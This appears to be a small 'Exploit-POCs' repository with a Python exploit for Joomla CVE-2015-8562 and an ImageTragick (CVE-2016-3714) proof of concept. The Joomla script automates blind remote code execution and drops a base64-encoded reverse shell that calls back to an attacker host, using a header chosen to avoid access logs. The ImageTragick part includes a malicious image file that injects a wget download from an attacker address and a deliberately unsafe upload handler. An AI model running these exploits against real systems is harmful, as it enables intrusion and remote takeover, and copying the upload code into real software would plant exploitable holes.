├── CVE-2015-8562
    └── joomla-rce.py
├── CVE-2016-3714
    ├── index.html
    ├── poc.jpg
    └── upload.php
├── LICENSE
└── README.md


/CVE-2015-8562/joomla-rce.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | # Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
  4 | # Date: 12/17/2015
  5 | # Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
  6 | # Vendor Homepage: https://www.joomla.org/
  7 | # Software Link: http://joomlacode.org/gf/project/joomla/frs/
  8 | # Version: Joomla 1.5 - 3.4.5
  9 | # Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
 10 | # CVE : CVE-2015-8562
 11 | 
 12 | 
 13 | '''
 14 |     Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
 15 |     PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
 16 | 
 17 |     Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): 
 18 |     https://www.exploit-db.com/exploits/38977/
 19 | 
 20 |     Vulnerability Info, Exploit, Detection:
 21 |     https://breakpoint-labs.com/joomla-rce-cve-2015-8562/
 22 | 
 23 |     Exploit modified to use "X-Forwarded-For" header instead of "User-Agent" to avoid default logged to access.log
 24 | 
 25 |     Usage - Automate Blind RCE:
 26 |     python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd
 27 |     $ touch /tmp/newhnewh    
 28 | 
 29 |     Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host:
 30 |     python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444
 31 |     [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/
 32 |     [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444
 33 |     <Response [200]>
 34 |     [+] Spawning reverse shell....
 35 |     <Response [200]>
 36 | 
 37 |     Listening on [0.0.0.0] (family 0, port 4444)
 38 |     $ python -c "import pty;pty.spawn('/bin/bash')"
 39 |     www-data@ubuntu:/$ id
 40 |     uid=33(www-data) gid=33(www-data) groups=33(www-data)
 41 |     www-data@ubuntu:/$ 
 42 | 
 43 | '''
 44 |     
 45 | import requests
 46 | import subprocess
 47 | import argparse
 48 | import sys
 49 | import base64
 50 |  
 51 | # Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com)
 52 | def get_url(url, user_agent):
 53 |  
 54 |     headers = {
 55 |     'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests
 56 |     'x-forwarded-for': user_agent   # X-Forwarded-For header instead of UA
 57 |     }
 58 |     cookies = requests.get(url,headers=headers).cookies
 59 |     for _ in range(3):
 60 |         response = requests.get(url, headers=headers,cookies=cookies)    
 61 |     return response
 62 | 
 63 | 
 64 | def php_str_noquotes(data):
 65 |     "Convert string to chr(xx).chr(xx) for use in php"
 66 |     encoded = ""
 67 |     for char in data:
 68 |         encoded += "chr({0}).".format(ord(char))
 69 |  
 70 |     return encoded[:-1]
 71 | 
 72 |  
 73 | def generate_payload(php_payload):
 74 |  
 75 |     php_payload = "eval({0})".format(php_str_noquotes(php_payload))
 76 |  
 77 |     terminate = '\xf0\xfd\xfd\xfd';
 78 |     exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
 79 |     injected_payload = "{};JFactory::getConfig();exit".format(php_payload)    
 80 |     exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
 81 |     exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
 82 |  
 83 |     return exploit_template
 84 | 
 85 | 
 86 | def main():
 87 |     parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652')
 88 |     parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')
 89 |     parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell')
 90 |     parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell')
 91 |     parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')
 92 | 
 93 |     args = parser.parse_args()
 94 | 
 95 |     if args.cmd:
 96 |         print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
 97 |         print "[-] Dropping into shell-like environment to perform blind RCE"
 98 |         while True:
 99 |             command = raw_input('$ ')
100 |             cmd_str = "system('{}');".format(command)
101 |             pl = generate_payload(cmd_str)
102 |             print get_url(args.RHOST, pl)
103 | 
104 |     # Spawn Reverse Shell using Netcat listener + Python shell on victim
105 |     elif args.LPORT and args.LPORT:
106 |         connection = "'{}', {}".format(args.LHOST, args.LPORT)
107 | 
108 |         # pentestmonkey's Python reverse shell one-liner:
109 |         shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'''
110 |         # Base64 encoded the Python reverse shell as some chars were messing up in the exploit
111 |         encoded_comm = base64.b64encode(shell_str)
112 |         # Stage 1 payload Str
113 |         payload = "echo {} | base64 -d > /tmp/newhnewh.py".format(encoded_comm)
114 |         print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
115 |         print "[-] Uploading python reverse shell with LHOST {} and {}".format(args.LHOST, args.LPORT)
116 |         # Stage 1: Uploads the Python reverse shell to "/tmp/newhnewh.py"
117 |         pl = generate_payload("system('"+payload+"');")
118 |         print get_url(args.RHOST, pl)
119 |         # Spawns Shell listener using netcat on LHOST
120 |         listener = subprocess.Popen(args=["gnome-terminal", "--command=nc -lvp "+args.LPORT])
121 |         print "[+] Spawning reverse shell...."
122 |         # Stage 2: Executes Python reverse shell back to LHOST:LPORT
123 |         pl = generate_payload("system('python /tmp/newhnewh.py');")
124 |         print get_url(args.RHOST, pl)
125 |     else:
126 |         print '[!] missing arguments'
127 |         parser.print_help()
128 | 
129 | 
130 | if __name__ == "__main__":
131 |     main()
132 | 


--------------------------------------------------------------------------------
/CVE-2016-3714/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |   <body>
 4 | 
 5 |     <form action="upload.php" method="post" enctype="multipart/form-data">
 6 |         Select image to upload:
 7 |         <input type="file" name="file" id="file">
 8 |         <input type="submit" value="Upload Image" name="submit">
 9 |     </form>
10 | 
11 |   </body>
12 | </html> 
13 | 


--------------------------------------------------------------------------------
/CVE-2016-3714/poc.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://fake-site.com/logo.png"|wget "http://[attacker-ip]:[attacker-port]/[file-name] "-O /tmp/[file-name]")'
4 | pop graphic-context
5 | 


--------------------------------------------------------------------------------
/CVE-2016-3714/upload.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 |   $target_dir = "/var/www/html/";
 4 |   $target_file = $target_dir . basename($_FILES["file"]["name"]);
 5 | 
 6 |   // Check if image file is a actual image or fake image
 7 |   if(isset($_POST["submit"])) {
 8 | 
 9 |     $target_dir = "/var/www/html/";
10 |     $target_file = $target_dir . basename($_FILES["file"]["name"]);
11 | 
12 |     move_uploaded_file($_FILES["file"]["tmp_name"], $target_file);
13 | 
14 |    // Imagemagick stuff for exploiting
15 |    // push graphic-context
16 |    // viewbox 0 0 640 480
17 |    // fill 'url(https://voidsec1.com/logo.png"|touch "/tmp/passwd)'
18 |    // pop graphic-context
19 | 
20 |    $im = new Imagick(realpath($target_file));
21 |    $im->setImageColorspace(255);
22 |    $im->setCompression(Imagick::COMPRESSION_JPEG);
23 |    $im->setCompressionQuality(60);
24 |    $im->setImageFormat('jpeg'); 
25 | 
26 |    echo "The file ". basename( $_FILES["file"]["name"]). " has been uploaded.";
27 |   }
28 | 
29 | ?>
30 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2015 
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 
23 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Exploit-POCs
2 | 


--------------------------------------------------------------------------------